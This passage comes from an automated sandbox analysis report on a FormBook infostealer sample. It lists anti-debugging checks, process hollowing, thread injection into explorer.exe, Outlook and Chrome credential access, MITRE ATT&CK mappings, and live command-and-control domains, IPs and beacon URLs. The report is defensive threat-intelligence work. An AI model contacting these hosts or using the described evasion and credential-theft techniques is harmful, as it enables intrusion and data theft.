          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]3_2_00B4FE87
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AE16E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]3_2_00AC76E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]3_2_00AE36CC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AF8EC7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]3_2_00B88ED6
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B6FEC0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]3_2_00AC8794
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]3_2_00AF37F5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]3_2_00AEE730
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]3_2_00ADF716
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]3_2_00ACFF60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]3_2_00B88F6A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]3_2_00ACEF40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040C317 LdrLoadDll,3_2_0040C317
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AB9E SetUnhandledExceptionFilter,1_2_0040AB9E
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AE6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040AE6C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040AA3F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040F790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040F790

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.35.86 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeDomain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.22.100.62 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.brennancorps.info
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 110000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.hJump to behavior
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.318601390.0000000005C70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.313026823.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360055157.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341089445.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040ACAB cpuid 1_2_0040ACAB
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040A928 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0040A928
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts512
          Process Injection          		21
          Input Capture          		141
          Security Software Discovery          		Remote Desktop Protocol21
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync15
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 756323 Sample: Lc8xQv8iZY.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for domain / URL 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 5 other signatures 2->41 9 Lc8xQv8iZY.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\hvbvmxm.exe, PE32 9->27 dropped 12 hvbvmxm.exe 1 9->12         started        process5 signatures6 53 Multi AV Scanner detection for dropped file 12->53 55 Machine Learning detection for dropped file 12->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->57 59 Maps a DLL or memory area into another process 12->59 15 hvbvmxm.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 20 explorer.exe 15->20 injected process9 dnsIp10 29 www.afterdarksocial.club 162.214.129.149, 49698, 49699, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 eufidelizo.com 192.185.217.47, 49695, 80 UNIFIEDLAYER-AS-1US United States 20->31 33 9 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 help.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Lc8xQv8iZY.exe49%ReversingLabsWin32.Trojan.Injuke
          Lc8xQv8iZY.exe47%VirustotalBrowse
          Lc8xQv8iZY.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe54%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.hvbvmxm.exe.21b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.hvbvmxm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.0.hvbvmxm.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.Lc8xQv8iZY.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          0.0.Lc8xQv8iZY.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

          Domains

          SourceDetectionScannerLabelLink
          www.patrickguarte.com1%VirustotalBrowse
          brennancorps.info1%VirustotalBrowse
          lopezmodeling.com3%VirustotalBrowse
          www.foxwhistle.com4%VirustotalBrowse
          eufidelizo.com9%VirustotalBrowse
          www.lyonfinancialusa.com0%VirustotalBrowse
          www.eufidelizo.com7%VirustotalBrowse
          www.brennancorps.info1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.lopezmodeling.com/henz/100%Avira URL Cloudmalware
          http://www.brennancorps.info/henz/100%Avira URL Cloudmalware
          www.brennancorps.info/henz/100%Avira URL Cloudmalware
          http://www.lyonfinancialusa.com/henz/100%Avira URL Cloudmalware
          http://www.afterdarksocial.club/henz/100%Avira URL Cloudmalware
          http://www.foxwhistle.com/henz/100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/100%Avira URL Cloudmalware
          http://206.119.101.137/ak_Address/Address.js0%Avira URL Cloudsafe
          http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.patrickguarte.com
          		155.159.61.221
          		truetrueunknown
          brennancorps.info
          		2.57.90.16
          		truetrueunknown
          lopezmodeling.com
          		192.185.35.86
          		truetrueunknown
          www.foxwhistle.com
          		154.22.100.62
          		truetrueunknown
          eufidelizo.com
          		192.185.217.47
          		truetrueunknown
          www.lyonfinancialusa.com
          		206.233.197.135
          		truetrueunknown
          www.afterdarksocial.club
          		162.214.129.149
          		truetrue
            		unknown
            www.eufidelizo.com
            		unknown
            		unknowntrueunknown
            www.brennancorps.info
            		unknown
            		unknowntrueunknown
            www.19t221013d.tokyo
            		unknown
            		unknowntrue
              		unknown
              www.lopezmodeling.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.lyonfinancialusa.com/henz/true
                • Avira URL Cloud: malware
                		unknown
                http://www.lopezmodeling.com/henz/true
                • Avira URL Cloud: malware
                		unknown
                http://www.brennancorps.info/henz/true
                • Avira URL Cloud: malware
                		unknown
                http://www.afterdarksocial.club/henz/true
                • Avira URL Cloud: malware
                		unknown
                www.brennancorps.info/henz/true
                • Avira URL Cloud: malware
                		low
                http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                		unknown
                http://www.foxwhistle.com/henz/true
                • Avira URL Cloud: malware
                		unknown
                http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                		unknown
                http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                		unknown
                http://www.patrickguarte.com/henz/true
                • Avira URL Cloud: malware
                		unknown
                http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/chrome_newtabhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                    		high
                    https://duckduckgo.com/ac/?q=-ODfqI49.5.drfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icohelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                        		high
                        https://search.yahoo.com?fr=crmas_sfpfhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-ODfqI49.5.drfalse
                            		high
                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorErrorLc8xQv8iZY.exefalse
                                		high
